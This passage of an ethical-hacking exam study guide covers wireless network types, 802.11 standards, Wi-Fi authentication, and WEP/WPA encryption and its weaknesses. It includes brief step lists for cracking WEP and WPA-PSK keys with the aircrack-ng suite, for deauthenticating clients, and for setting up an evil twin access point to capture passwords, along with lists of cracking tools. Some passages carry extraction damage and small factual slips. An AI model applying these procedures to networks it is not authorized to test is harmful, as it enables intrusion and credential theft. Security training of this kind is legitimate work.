In this chapter, we will learn about wireless networks, various types of wireless networks, Wi-Fi authentication modes, and types of wireless encryption. This chapter focuses on wireless hacking methodology, Bluetooth hacking, and Wireless penetration testing. 15.1 Understand wireless networks, various types of wireless networks, and Wi-Fi authentication modes Exam Focus: Understand wireless networks, various types of wireless networks, and Wi-Fi authentication modes. Objective includes: Understand wireless networks. Gain insights on wireless networks. Understand various types of wireless networks. Understand Wi-Fi authentication modes. Wireless network A wireless network refers to any type of computer network that is wireless, and is commonly associated with a telecommunications network whose interconnections between nodes are implemented without the use of wires. Wireless telecommunications networks are generally implemented with some type of remote information transmission system that uses electromagnetic waves, such as radio waves, for the carrier and this implementation usually takes place at the physical level or "layer" of the network. Wi-Fi Wi-Fi was developed on the IEEE 802.11 standard. It is widely used in wireless communication. It is used to provide wireless access to applications and data across a radio network. Wi-Fi establishes different ways to set up a connection between the transmitter and the receiver such as DSSS, FHSS, Infrared, and OFDM. The following are the advantages of wireless networks: Installation is fast and easy and it eliminates wiring via walls and ceilings. It is easier to provide connectivity in places where laying cable is difficult. The network can be accessed from anywhere within the range of an access point. Constant internet connections using wireless LAN are used in public places such as airports, libraries, and schools. The following are the disadvantages of wireless networks: Wireless networks are not very secure. The bandwidth suffers as the number of computers on the network increases. There are some electronic equipment that can interfere with the Wi-Fi networks. Wireless terminologies Some important wireless terminologies are given below: Terminologies Description GSM It is a standard developed by the European Telecommunications Standards Institute (ETSI) that defines protocols for 2G digital cellular networks used by mobile phones. Directional antenna It sends and receives signals from a specific direction. Omni-directional antenna It is a vertical antenna system which sends or receives signals in all directions. Wi-Fi Finder It is used to find a Wi-Fi network. Association It is the process of connecting a wireless device to an access point. Authentication It is the process of identifying a device before allowing it to access the network resources. BSSID It is an identifier used to identify a particular BSS (Basic Service Set) within an area. WPA It is an advanced security protocol for WLAN. It uses TKIP, MIC, and AES encryption. WEP It is a security protocol for WLANs. It has two components, authentication and encryption. Gigahertz It is a unit of frequency equal to one thousand million hertz (1,000,000,000 Hz). Hotspot It represents a place where a wireless network is available for public use. Access point It connects wireless devices to a wireless network. ISM band It is a frequency band that is reserved internationally for the use of radio frequency (RF) energy for industrial, scientific, and medical purposes except communications. Bandwidth It is a measurement of how much data can be sent in a period of time. Types of wireless networks The following are types of wireless networks: WPAN: WPAN is a wireless personal area network that interconnects devices centered on an individual person's workspace. A wireless personal area network uses a technology that permits communication within a range of 20 feet. WPAN operates at frequencies of around 2.4 GHz in digital modes and supports only eight active devices. It is defined in the IEEE 802.15 standard. Bluetooth is an example of a wireless personal area network. WLAN: A wireless LAN (or WLAN, for wireless local area network, sometimes referred to as LAWN, for local area wireless network) is one in which a mobile user can connect to a local area network (LAN) through a wireless (radio) connection. The IEEE 802.11 is a group of standards that specifies the technologies for wireless LANs. 802.11 standards use the Ethernet protocol and CSMA/CA (carrier sense multiple access with collision avoidance) for path sharing and include an encryption method, the Wired Equivalent Privacy algorithm. High-bandwidth allocation for wireless will make possible a relatively low-cost wiring of classrooms in the United States. A similar frequency allocation has been made in Europe. Hospitals and businesses are also expected to install wireless LAN systems where existing LANs are not already in place. WMAN: Wireless Metropolitan Area Network (WMAN) represents a wireless network that connects two or more wireless LANs in the same geographical area. WMANs are used as backbone services as well as point-to-point and point-to-multipoint links, which are implemented using high-speed connections such as T1, T3, etc. WMAN is also known as a Wireless Local Loop (WLL). WMANs are defined in the IEEE 802.16 standard. An example of Wireless Metropolitan Area Network is WiMAX, which provides last-mile access as an alternative to broadband services such as DSL or cable connections. WiMAX provides fixed, roaming, portable and soon mobile wireless broadband connectivity without the need of direct line of sight with a base station. WWAN: WWAN, which stands for Wireless Wide Area Network, is a form of wireless network. A WWAN differs from WLAN (wireless LAN) in that it uses Mobile telecommunication cellular network technologies, such as WiMAX (though it is better applied to WMAN Networks), UMTS, GPRS, CDMA2000, GSM, CDPD, Mobitex, HSDPA, or 3G to transfer data. It can also use LMDS and Wi-Fi to connect to the Internet. These cellular technologies are offered regionally, nationwide, or even globally and are provided by a wireless service provider, typically on paid basis. This type of connectivity allows a user with a laptop and a WWAN card to surf the web, check email, or connect to a Virtual Private Network (VPN) from anywhere within the regional boundaries of cellular service. Various computers now have integrated WWAN capabilities (such as HSDPA in Centrino). This means that the system has a cellular radio (GSM/CDMA) built in, which allows the user to send and receive data. WLAN summarized! Wireless Local Area Network (WLAN) is a network that enables devices to connect to the network wirelessly. WLAN uses radiated energy, commonly called high-frequency radio waves, to communicate amongst nodes. Organizations that Influence WLAN Standards The four major organizations that set or influence WLAN standards are described below: ITU-R: International Telecommunications Union-Radio communication (ITU-R) is a worldwide organization of United Nations. It works for standardization of communications that use radiated energy. Its prime objective is to manage the assignment of frequencies. IEEE: Institute of Electrical and Electronic Engineers (IEEE) is a society of technical professionals. It promotes the development and application of electro-technology and allied sciences. IEEE develops communications and network standards, among other activities. The organization publishes a number of journals. The organization has many local chapters and societies in specialized areas. Wi-Fi Alliance: Wi-Fi Alliance is an industry consortium that encourages interoperability of products that use WLAN standards. The consortium runs a certification program and recognizes products, which are implementing WLAN standards, as Wi-Fi certified products. FCC: Federal Communications Commission (FCC) is an independent US government agency. It regulates interstate and international communications by radio, television, wire, satellite, and cable in the United States of America. Modes of Wireless LANs There are two modes of WLANs: ad hoc mode and infrastructure mode. Ad hoc mode WLAN: An ad hoc network consists of two or more wireless devices that communicate directly with each other. The wireless local area network (WLAN) network interface adapters in the wireless devices generate omni-directional signals within a limited range called Basic Service Area (BSA). When two wireless devices come within the range of each other, they immediately form a two-node network and are able to communicate with each other. An ad hoc network is non-transitive. Infrastructure mode WLAN: An infrastructure network consists of an access point that connects wireless devices to the standard cable network. An access point is connected to a cabled network through a cable and it generates omni-directional signals. When wireless devices come within the range of the access point, they are able to communicate with the cabled local area network. The access point works as a central bridge device to include wireless devices in the cabled LAN. Wireless Technologies 802.11: This is the latest networking specification for wireless local area networks (WLANs), developed by the Institute of Electrical and Electronic Engineers. It contains several subspecifications, and the IEEE is constantly adding new specifications. This specification uses Carrier Sense Multiple Access with Collision Avoidance (CSMS/CA) media access control mechanism. 802.11 supports 1 or 2 Mbps transmission in the 2.4 GHz ISM band using Frequency Hopping Spread Spectrum (FHSS). 802.11x: It contains various specifications for the 802.11 family of Wireless LAN network standards. Some of the specifications in this family are still under development. The 802.11b specification uses Direct Sequence Spread Spectrum (DSSS) and supports 11 Mbps transmission in the 2.4 GHz band. Infrared: The Infrared technology uses invisible infrared radiations to transmit signals to short distances. There are two types of networks communication possible, one in which the sender and the receiver are visible to each other and are situated in a straight line known as line-of-sight mode; the other type of communication known as diffuse mode does not require the sender and receiver to be directly visible to each other. This technology is used in TV sets, cordless microphones, laptops, remote modems, printers, and other peripheral devices. Infrared networks use frequencies in the terahertz range and support transmission speeds of 1 to 2 Mbps. Bluetooth: The Bluetooth technology uses short-range radio frequencies to transmit voice and data signals at the speed of 1 Mbps on a frequency of 2.4 Ghz. Bluetooth is used to automatically synchronize information among different types of computers like desktops, laptops, and palmtops, or connecting to the Internet through a cell phone. Important Protocols WAP: Wireless Application Protocol (WAP) supports mobile computing. It was developed by the WAP forum. The functionality of WAP is equivalent to that of TCP/IP. WAP uses a smaller version of HTML called Wireless Markup Language (WML) to display Internet sites. WEP: Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks (WLANs). It has two components, authentication and encryption. It provides security which is equivalent to wired networks for wireless networks. WEP encrypts data on a wireless network by using a fixed secret key. WEP incorporates a checksum in each frame to provide protection against the attacks that attempt to reveal the key stream. Infrastructure network Infrastructure is a basic topology of a wireless network. An infrastructure network consists of an access point that connects wireless devices to the standard cable network. An access point is connected to the cabled network through a cable and it generates omni-directional signals. When wireless devices come within the range of the access point, they are able to communicate with the cabled local area network. The access point works as a central bridge device to include wireless devices in the cabled LAN. Wireless standards The following are wireless standards: 802.11a: The IEEE 802.11a standard for WLAN uses the U-NII spectrum at 5GHz. It uses the Orthogonal Frequency Division Multiplexing (OFDM) encoding class. The maximum speed supported by the 802.11a standard is 54Mbps. 802.11b: 802.11b is an amendment to the IEEE 802.11 specification that extended the throughput up to 11 Mbit/s using the same 2.4 GHz band. This specification under the marketing name of Wi-Fi has been implemented across the world. 802.11b is used in a point-to-multipoint configuration, wherein an access point communicates via an omnidirectional antenna with one or more nomadic or mobile clients that are located in a coverage area around the access point. 802.11g: The 802.11g standard, defined by IEEE, is an extension to the 802.11b standard of a wireless network. It operates in the 2.4-GHz band and brings data rates up to 54Mbps, using the Orthogonal Frequency-Division Multiplexing (OFDM) technology. Since the 802.11g standard is backward compatible with 802.11b, an 802.11b device can interface directly with an 802.11g access point. 802.11i: The 802.11i standard of IEEE specifies the security mechanisms for Wireless LAN (WLAN). The standards include authentication and encryption. 802.11n: IEEE 802.11n is an upcoming improvement to the IEEE 802.11-2007 wireless networking standard to improve the network throughput over previous standards, such as 802.11b and 802.11g. The IEEE 802.11n standard offers data rates from 54 Mbps to a maximum of 600 Mbps. The current state of the art supports a physical rate of 450 Mbps, with the use of 3 spatial streams at a channel width of 40 MHz. Depending on the environment, this may translate into a user throughput of 110 Mbps. 802.16: IEEE 802.16 is a set of Wireless Broadband standards authorized by the IEEE. IEEE 802.16 is written by a workgroup of IEEE Standards Board in 1999 to develop standards for the global deployment of broadband Wireless Metropolitan Area Networks. The workgroup is a unit of the IEEE 802 LAN/MAN Standards Committee. IEEE 802.16 standard is also known as the wireless metropolitan area network (Wireless MAN) standard. Bluetooth: Bluetooth supports a very short range (10 meters) and relatively low bandwidth (1-3 Mbps). It is designed for low-power network devices. IEEE 802 Members The Institute of Electrical and Electronics Engineering (IEEE) is a leading organization in the world. It constituted a task force to set standards for connectivity between NIC and transmission media. This task force is known as the 802 committee. The 802 committee was subdivided into several sub groups, and each group is responsible for the implementation of a single standard that specifies the data transfer that occurs at the data link layer of the OSI model. A brief description of these sub groups are described below: 802.1 This standard is responsible for data communication between all seven layers of the OSI model. 802.2 It defines LLC (Logical layer control) sub layer of data link layer that is used by lower layer protocols. 802.3 The 802.3 standard defines Ethernet and the functions related to MAC (medium access control) sub layer of the data link layer. There are different types of transmission media in 802.3. 1BASE5: The data transfer rate is 1Mbps and it uses UTP cable with a signal range up to 500 meters. In this standard, the star topology is used. 10BASE5: It is also known as thick Ethernet and it supports data transfer rate of 10Mbps with a signal range up to 500 meters. In this standard, coaxial thicknet cable is implemented. 10 BASE2: It uses thinnet coaxial cable and has a data transfer speed of 10Mbps. In this standard, the bus topology is used. 10BASE F: It implements fiber optics cable. The data transfer rate is 10Mbps. Conceived in the 1960s, the Ethernet (802.3) is the oldest and most popular data link layer protocol (or network technology) used in today's networks. Ethernet networks use a bus or star topology and control the flow of data through the media access control (MAC) method known as Carrier Sense Multiple Access Collision Detection (CSMA/CD). The use of CSMA/CD ensures that each computer in a network can send its signals over the network. To send signals over the network, a computer waits for the network to be free of any traffic. If the network is free, the computer sends its signals that travel through the network and are received by the destination computer. Sometimes more than one computer sends its signals over the network, which results in a collision. Collisions in these types of networks cannot be avoided, as CSMA/CD can detect it only when they occur. It then resends the data over the network again to compensate the data loss. Ethernet networks run at various speeds, depending on the type of topology and cabling used. Ethernet technology is widely implemented in the star topology using coaxial or fiber optic cables, and in the bus topology using UTP cable. 802.4 This defines a network with the bus topology that implements media access control with token mechanism. 802.5 This defines a network with the ring topology. It uses media access control with token mechanism. It supports data transfer rate of 1, 4, and 16 Mbps. Originally developed by IBM, the token ring is an intricate but highly dependable networking technology that follows the IEEE 802.5 standard. The type of topology used in this technology is physically a star, but implemented logically as a ring, in which all the computers are attached to a central unit called a multistation access unit (MAU OR MSAU). Token ring networks use token passing to send their signals over the network. Token is a type of data packet, which circulates in the entire network. If the token is free, the computer waiting to send data takes it, attaches the data and the destination address to the token, and sends it. When the token reaches its destination computer, the data is received. Then, the token gets back to the originator. If the originator finds that the message has been received, it removes the message from the token. Now, the token is free and can be used by other computers in the network to send data. Token ring networks are more fault tolerant than the Ethernet, as the MSAU ensures that the failure of a single computer does not bring the entire network down. It is an intelligent device, which identifies the failing computer in the network, and then bypasses it to correct the errors. The modern day token ring networks use unshielded twisted pair (UTP) cable and run at speeds of 16 Mbps as opposed to the original token ring networks developed by IBM that used shielded twisted pair (STP) cable and ran at 4 or 16 Mbps. 802.6 This describes MAN standard known as Distributed Queue Dual Bus (DQDB). DQDB is designed for data, voice, and video transmission through fiber optics cable. The dual bus topology is employed and traffic on each bus is unidirectional. 802.8 This standard deals with the implementation of fiber optics technology in networking environment. 802.11 The IEEE 802.11 standards define wireless local area network (WLAN) computer communication in the 5GHz and 2.4GHz public spectrum bands. These specifications define an over-the-air interface between a wireless client and a base station or access point. The 802.11 specifications also define standards among wireless clients. These specifications address both the Physical (PHY) and Media Access Control (MAC) layers and are tailored to resolve compatibility issues between manufacturers of wireless LAN equipment. Apart from these IEEE standards, there is one more standard named FDDI developed by ANSI. FDDI (Fiber Distributed Data Interface) Developed by the American National Standards Institute (ANSI), FDDI is a ring-based network that uses fiber optic cables to provide very fast and reliable communication between the connected computers. It uses token passing to control the network access but does not use a hub like the token ring networks; instead, it uses a central device called a concentrator to connect the computers in the network. In these networks, the computers are connected using a physical ring topology. There are two types of configurations used by FDDI networks, namely class A and class B configurations. In class A, a double ring topology is used in which the computers are connected to two rings. The signals travel in the opposite directions on both the rings. If there is a fault in one ring, the receiving computer can still receive the signal through the other ring. These networks provide a better fault tolerance. Class B networks use a single physical ring and are, therefore, less fault tolerant. FDDI networks run at speeds of 100 Mbps and, as they use fiber optic cables, provide connectivity over long distances. These networks have now been replaced by Fast Ethernet networks that provide the same speed and are more fault tolerant. SSID SSID stands for Service Set Identifier. It is used to identify a wireless network. SSIDs are case sensitive text strings and have a maximum length of 32 characters. All wireless devices on a wireless network must have the same SSID in order to communicate with one another. The SSID on computers and the devices in WLAN (Wireless Local Area Network) can be set manually and automatically. Configuring the same SSID as that of the other Wireless Access Points (WAPs) of other networks will create a conflict. A network administrator often uses a public SSID that is set on the access point. The access point broadcasts SSID to all wireless devices within its range. Some newer wireless access points have the ability to disable the automatic SSID broadcast feature in order to improve network security. Wi-Fi authentication modes The open system authentication process includes the following steps: 1. A client sends an 802.11 authentication management frame that includes its SSID. 2. Access Point (AP) checks the client's SSID and sends back an authentication verification frame. 3. The client connects to the network. The shared key authentication process includes the following steps: 1. 2. 3. 4. 5. A client trying to connect sends an authentication request to Access Point (AP). The AP sends challenge text. The client encrypts challenge text and sends it back to the AP. The AP decrypts challenge text and authenticates the client. The client connects to the network. Wi-Fi authentication process The Wi-Fi authentication process includes the following steps: 1. The AP issues a challenge to the wireless client. The wireless client responds with his identity. 2. The AP forwards the identity to the RADIUS server using the uncontrolled port. 3. The RADIUS server sends a request to the wireless station through the AP specifying the authentication mechanism to be used. 4. The wireless station responds to the RADIUS server with its credentials through the AP. 5. The RADIUS server sends an encrypted authentication key to the AP if the credentials are acceptable. 6. The AP generates a multicast/global authentication key encrypted with a per-station unicast session key and transmits it to the wireless station. Wi-Fi authentication process using a centralized authentication server The Wi-Fi authentication process includes the following steps: 1. 2. 3. 4. 5. A client requests a connection from Access Point (AP). The AP sends EAP-request for identity to the client. The client sends EAP-response with identity to the AP. The AP forwards the identity to the RADIUS server using the uncontrolled port. The RADIUS server sends a request to the wireless client through the AP specifying the authentication mechanism to be used. 6. The wireless client responds to the RADIUS server with its credentials through the AP. 7. The RADIUS server sends an encrypted authentication key to the AP if the credentials are acceptable. 8. The AP sends a multicast/global authentication key encrypted with a per-station unicast session key. Wi-Fi chalking Some examples of Wi-Fi chalking are as follows: Wardriving: Wardriving is a technique used to locate insecure wireless networks while driving around. The following are wardriving tools: o StumbVerter o MiniStumbler o ApSniff o o o Driftnet WiFiFoFum WarLinux Warflying: Warflying is similar to wardriving. It includes flying around in an aircraft, searching for open wireless networks. Warchalking: Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless network. Having found a Wi-Fi node, the warchalker draws a special symbol on a nearby object, such as a wall, the pavement, or a lamp post. The name warchalking is derived from the cracker terms war dialing and war driving. Warwalking: Warwalking is a technique similar to wardriving. It is the act of walking around with a Wi-Fi enabled laptop to get an access point for a wireless network. Wi-Fi chalking symbols Symbols Description Free Wi-Fi Wi-Fi with MAC filtering Restricted Wi-Fi Pay for Wi-Fi Wi-Fi with WPA Wi-Fi with multiple access controls Wi-Fi with closed SSID Wi-Fi honeypot Types of wireless antenna The following are types of wireless antenna: Omni-directional antenna: It is a vertical antenna system which sends or receives signals in all directions. Signals generated through an omni antenna lose power as the distance increases. Such antennas are used with Wireless Access Points (WAPs). Parabolic antenna: A parabolic antenna is a high gain reflector antenna used for radio, television, and data communications. It is the most efficient type of directional antenna. It provides a large front/back ratio, a very sharp radiation angle, and small side lobes. The relatively short wavelengths of electromagnetic radiation at these frequencies allow reasonably sized reflectors to exhibit the desired highly directional response for both receiving and transmitting. It is the best choice for noisy locations where other antennas probably do not work. Yagi antenna: It is a directional antenna. It comprises a dipole, a reflector, which is an element bigger than the dipole, and one or more shorter elements as directors in front of the dipole. Dipole antenna: It is an antenna that can be made by a simple wire with a center-fed driven element for transmitting or receiving radio frequency energy. This antenna is simply a pair of two wires pointed in opposite directions, arranged either horizontally or vertically, with one end of each wire connected to the radio and the other end hanging free in space. Since this is the simplest practical antenna, it is also used as a reference model for other antennas. The current amplitude on such an antenna decreases uniformly from maximum at the center to zero at the ends. MAC filtering MAC filtering is a security access control technique that allows specific network devices to access or prevent them from accessing the network. MAC filtering can also be used on a wireless network to prevent certain network devices from accessing the wireless network. MAC addresses are allocated only to hardware devices, not to persons. 15.2 Identify types of wireless encryption, and understand WEP encryption and WPA/WPA2 Exam Focus: Identify types of wireless encryption, and understand WEP encryption and WPA/WPA2. Objective includes: Identify types of wireless encryption. Understand WEP encryption. Understand WPA/WPA2. Discuss wireless threats. Types of wireless encryption The following are the types of wireless encryption: WEP: It is an old and original wireless security standard. It can be cracked easily. WPA: It uses a 48 Initialization Vector (IV), and 32-bit CRC and TKIP encryption for wireless security. WPA2: It is used to provide network administrators with a high level of assurance that only authorized users are able to access the network. It provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm. WPA2 Enterprise: It integrates the EAP standard with WPA encryption. TKIP: It is a security protocol. It is used in WPA as a replacement for WEP. AES: It is a symmetric key encryption. It is used in WPA2 as a replacement for TKIP. EAP: It uses multiple authentication methods. LEAP: It is a proprietary WLAN authentication protocol. RADIUS: It is considered as a centralized authentication and authorization management system. 802.11i: It is an IEEE standard. It specifies security mechanism for 802.11 wireless networks. CCMP: It uses 128-bit keys with a 48-bit IV for replay protection. WEP WEP stands for Wired Equivalent Protection. It is a wireless security standard that uses either a 64-bit or a 128-bit encryption. It is the most commonly and widely accepted security standard. Almost all the available operating systems, wireless access points, wireless bridges support this security standard. WEP uses 24-bit initialization vector to form stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity of wireless transmission. It has major vulnerabilities and design flaws. The following is the working of WEP: 1. 2. 3. 4. For the frame data, a 32-bit Integrity Check Value (ICV) is calculated. The ICV is added at the end of the frame data. A 24-bit Initialization Vector is produced and added to the WEP encryption key. To generate a key stream, the combination of Initialization Vector and the WEP is used as the input to RC4 algorithm. 5. To produce the encrypted data, the key stream is bit-wise XORed with the combination of data and ICV. 6. To generate a MAC frame, the Initialization Vector is added to the encrypted data and ICV. WEP issues The following are WEP issues: The Initialization Vector is a 24-bit field and is sent in the cleartext portion of a message. There is no defined method for encryption key distribution. The reuse of the same IP for data protection produces identical key streams. Key streams are repeated within a short time as the Initialization Vector is a short key. The same Initialization Vector may be generated by wireless adapters from the same vendor. This may help attackers to determine the key stream and decrypt the ciphertext. It is difficult to change the WEP keys regularly due to lack of centralized key management. Associate and dissociate messages are not authenticated. The RC4 keystream can be reconstructed on the basis of the Initialization Vector (IV) and the decrypted payload of the packet when there is IV collision. WEP does not provide cryptographic integrity protection. An attacker can flip a bit in the encrypted stream by capturing two packets and modify the checksum to obtain the packet. Initialization Vector is a part of the RC4 encryption key. It results in an analytical attack. In the analytic attack, the key is recovered after intercepting and analyzing a relatively small amount of traffic. WEP is based on a password. The password can be cracked using password cracking attacks. An attacker can make and use a decryption table of the reconstructed keystream to decrypt the WEP packets in real-time. Breaking WEP encryption The following actions can be taken to break WEP encryption: 1. The injection capability of the wireless device to the access point should be tested. 2. Wi-Fi sniffing tools such as airodump-ng or Cain & Abel should be started with bssid filter to collect unique IVs. 3. A cracking tool such as Cain & Abel or aircrack-ng should be run to extract encryption keys from IVs. 4. The wireless monitor should be started in monitor mode on the specific access point channel. 5. A tool such as aireplay-ng should be used to perform a fake authentication with the access point. 6. A Wi-Fi packet encryption tool such as aireplay-ng should be started in ARP request replay mode to inject packets. Crack WEP using aircrack Take the following steps to crack WEP using aircrack: 1. Monitor wireless traffic with airmon-ng and collect wireless traffic data with airodumpng. 2. Associate your wireless cars with the AP you are accessing with aireplay-ng and start packet injection with aireplay-ng. 3. Decrypt the WEP key with aircrack-ng. Countermeasures to prevent WEP cracking A user can use some countermeasures to prevent WEP cracking. WEP is the least secure protocol and it should not be used. However, a user can use the following methods to mitigate WEP cracking: Use a non-obvious key. Use the longest key supported by hardware. Change keys often. Use WEP in combination with other security features, such as rapid WEP key rotation and dynamic keying using 802.1x. Consider WEP a deterrent, not a guarantee. WPA WPA stands for Wi-Fi Protected Access. It is a wireless security standard. It provides better security than WEP (Wired Equivalent Protection). TKIP uses the RC4 stream cipher encryption with 128-bit keys and 64 bit-keys for authentication. The WEP key derivation vulnerability is mitigated by TKIP as TKIP does not involve reusing the same Initialization Vector. The client starts with a 128-bit "temporal key" (TK) under TKIP. The 128-bit "temporal key" is then combined with client's MAC address and with an Initialization Vector in order to create a key used for encrypting data through the RC4. TKIP adds a rekeying mechanism to WEP to provide fresh encryption and integrity keys. Temporal keys are changed for every 10,000 packets, making TKIP protected networks more resistant to cryptanalytic attacks that involve key reuse. The following is the working of WPA: 1. To generate a Keystream, temporal encryption key, transmit address, and TKIP sequence counters are used as input to the RC4 algorithm. 2. The Michael algorithm is used to combine MAC Service Data Unit (MSDU) and message integrity check (MIC). 3. To generate MAC Protocol Data Unit (MPDU), the combination of MSDU and MIC is fragmented. 4. For the MPDU, a 32-bit Integrity Check Value (ICV) is calculated. 5. To produce the encrypted data, the combination of MPDU and ICV is bitwise XORed with Keystream. 6. To generate MAC frame, the Initialization Vector is added to the encrypted data. Windows Vista supports both WPA-PSK and WPA-EAP. WPA-PSK: PSK stands for Preshared key. This standard is meant for the home environment. WPA-PSK requires a user to enter an 8-character to 63-character passphrase into a wireless client. WPA converts the passphrase into a 256-bit key. WPA-EAP: EAP stands for Extensible Authentication Protocol. This standard relies on a back-end server that runs Remote Authentication Dial-In User Service for user authentication. Note: Windows Vista supports a user to use a smart card to connect to a WPA-EAP protected network. Temporal keys During the four-way handshake, the encryption keys (temporal keys) are derived in WPA1 and WPA2. Encryption keys are derived from the PMK that is derived during the EAP authentication session. In the EAP success message, PMK is sent to the AP but is not directed to the Wi-Fi client as it has derived its own copy of the PMK. Crack WPA-PSK using Aircrack Take the following steps to crack WPA-PSK using Aircrack: 1. Monitor wireless traffic with airmon-ng and collect wireless traffic data with airodumpng. 2. Deauthenticate the client using aireplay-ng. The client will attempt to authenticate with the AP. 3. Run the capture file through aircrack-ng. Defend against WPA cracking Passphrases: Sniff the password PMK associated with the "handshake" authentication process. It will be almost impossible to crack the password if it is extremely complicated. Passphrase complexity: A random passphrase that is not made up of dictionary words should be selected. A complex passphrase having the minimum length of 20 characters should be selected and changed at regular intervals. Client settings: WPA2 should only be used with AES/CCMP encryption. The client settings should be set properly. Additional controls: The virtual private network technology such as Remote Access VPN, Extranet VPN, Intranet VPN, etc. should be used. A Network Access Control (NAC) or Network Access Protection (NAP) solution should be implemented for additional control over end-user connectivity. WPA2 WPA2 is an updated version of WPA. This standard is also known as IEEE 802.11i. WPA2 offers enhanced protection to wireless networks than WPA and WEP standards. It is also available as WPA2-PSK and WPA2-EAP for home and enterprise environment, respectively. Break WPA/WPA2 encryption WPA PSK initializes the TKIP by using a user defined password. As the TKIP is a per-packet key, it is not crackable. However, the keys can be brute-forced using dictionary attacks. WPA keys can be brute-forced using tools such as aircrack, aireplay, and KisMAC. To capture the WPA/WPA2 authentication handshake, a user only needs to be near the AP for a matter of seconds. A user can crack WPA keys offline by capturing the right type of packets. WEP vs. WPA vs. WPA2 Attributes Encryption algorithm WEP RC4 RC4, TKIP WPA2 AES-CCMP IV size 24-bit 48-bit 48-bit Encryption key length 40/104-bit 128-bit Integrity check mechanism CRC-32 WPA 128-bit Michael algorithm and CRC-32 AES-CCMP Initialization Vector (IV) An initialization vector (IV) is a block of bits that is required to allow a stream cipher or a block cipher to be executed in any of several streaming modes of operation to produce a unique stream independent from other streams produced by the same encryption key, without having to go through a re-keying process. The size of the IV depends on the encryption algorithm and on the cryptographic protocol in use and is normally as large as the block size of the cipher or as large as the encryption key. The IV must be known to the recipient of the encrypted information to be able to decrypt it. Weak Initialization Vectors The Key Scheduling Algorithm creates an Initialization Vector (IV) on the basis of the base key in the RC4 algorithm. A flaw in the WEP implementation of RC4 permits generation of weak IVs. IVs become susceptible to weak key attacks due to the way keys are constructed from the IV. Weak IVs give information regarding the key bytes they were derived from. In order to reveal bytes of the base key, an attacker will gather enough weak IVs. Weak IVs involve the use of the master key. It has no built-in provision for updating the keys. WEP/WPA cracking tools The following are WEP/WPA cracking tools: WepAttack Wesside-ng WEPCrack ChopChop WeDecrypt KisMAC KisMAC is an open-source and free sniffer/scanner application for Mac OS X. It is more advantageous than MacStumbler / iStumbler / NetStumbler, because it uses monitor mode and passive scanning. KisMAC supports the 802.11b/g network. It reveals hidden, cloaked, or closed SSIDs, shows logged in clients, and draws area maps of network coverage. Elcomsoft Wireless Security Auditor Network administrators use Elcomsoft Wireless Security Auditor to audit accessible wireless networks. It has a built-in wireless network sniffer. It protects work sniffer. It protects your wireless networks and tests the strength of WPA/WPA2 -PSK passwords. AirSnort AirSnort is a Linux-based WLAN WEP cracking tool that recovers encryption keys. AirSnort operates by passively monitoring transmissions. It uses Ciphertext Only Attack and captures approximately 5 to 10 million packets to decrypt the WEP keys. WEPcrack WEPcrack is a wireless network cracking tool that exploits the vulnerabilities in the RC4 algorithm, which comprises the WEP security parameters. It mainly consists of three tools: WeakIVGen: It allows a user to emulate the encryption output of 802.11 networks to weaken the secret key used to encrypt the network traffic. Prism-getIV: It analyzes packets of information until ultimately matching patterns to the one known to decrypt the secret key. WEPcrack: It pulls all beneficial data of WeakIVGen and Prism-getIV to decipher the network encryption. Wireless threats The following are wireless threats: Wireless access control attack Integrity attack Confidentiality attack Availability attack Authentication attack Wireless access control attack The primary goal of a wireless access control attack is to penetrate a network by using WLAN access control measures, such as AP MAC filters and 802.1X port access controls. Some examples of wireless access control attacks are as follows: Wardriving: In this attack, the attacker discovers wireless LANs by listening to beacons or sending probe requests. Thus, it provides a launch point for further attacks. Rogue access points: In this attack, the attacker installs an unsecured access point inside a firewall to create an open backdoor into a trusted network. Ad hoc associations: In this attack, the attacker connects directly to an unsecured station to avoid AP security or to attack station. MAC Spoofing: In this attack, the attacker reconfigures an attacker's MAC address to mask as an authorized AP or station. Promiscuous client: It is similar to an evil twin attack. The only difference is that a promiscuous client is not based on fooling a user to get a free unsecured network. It forces the user to connect to the unsecured network. Client mis-association: In this attack, the attacker sets up a rogue access point outside the corporate network and allows users to connect to it and bypass the security policies through it. Unauthorized association: In this attack, the attacker infects the victim's system and activates soft access points, This allows attackers to access unauthorized connection to the enterprise network. AP misconfiguration: In this attack, the attacker steals SSID and connects to the access point. To broadcast SSIDs to authorized users, access points are configured. Network administrators incorrectly use SSIDs as passwords in order to verify authorized users. Intruders use SSID broadcasting to steal an SSID and connect to the access point. SSID broadcasting is a configuration error. Integrity attack An integrity attack sends forged control, management or data frames over a wireless network in order to mislead the recipient or perform another type of attack. Some examples of the integrity attack are as follows: Data frame injection: In this attack, the attacker crafts and sends forged 802.11 frames. WEP injection: In this attack, the attacker cracks WEP encryption keys using tools. Data replay: In this attack, the attacker captures 802.11 data frames for later replay. Initialization vector replay attack: In this attack, a known plaintext is sent to an observable WLAN client. The attacker sniffs the WLAN that is predicted ciphertext and finds out the known frame to originate the key stream. Then, he grows this key stream to subvert the network. Bit-flipping attack: In this attack, the attacker tampers with the payload of the frame for modifying the higher layer packet. Extensible AP replay: In this attack, the attacker captures 802.1X extensible authentication protocols for later replay. RADIUS replay: In this attack, the attacker captures RADIUS access-accept or reject messages for later replay. Virus: It is a computer program that can copy itself and infect a computer without the permission or knowledge of the owner. Confidentiality attack In a confidentiality attack, private information is sent over wireless associations. It may be in the cleartext, or encrypted by 802.11 or higher layer protocols. Some examples of the confidentiality attack are as follows: Eavesdropping: It is the process of listening to private conversations and network traffic to gain confidential information. Traffic analysis: It is the process of identifying communication patterns and participants by monitoring transmissions. Evil twin AP: It is the process of masquerading as an authorized AP by beaconing the SSID to lure users. A laptop with Internet connectivity (3G or wired connection) and a mini access point are required to set up evil twin. Take the following steps to set up evil twin: 1. Enable Internet Connection Sharing in Windows 7 or Internet Sharing in Mac OS X. 2. Broadcast your Wi-Fi connection and capture passwords by running a sniffer program. Masquerading: It is the process of impersonating an authorized user in order to gain specific unauthorized privileges. Cracking WEP key: It is the process of recovering a WEP key by capturing data using a passive or active method. Man-in-the-middle attack: It is the process of intercepting TCP sessions or SSH/SSL tunnels using MITM tools on an evil twin AP. Session hijacking: It refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system. Honeypot access point: Hackers set up honeypot access point with default SSIDs, hotspot SSIDs, and corporate SSIDs. Client automatically connects to this AP that executes various attacks on the client. Evil twin phishing Evil twin phishing is the wireless version of the phishing 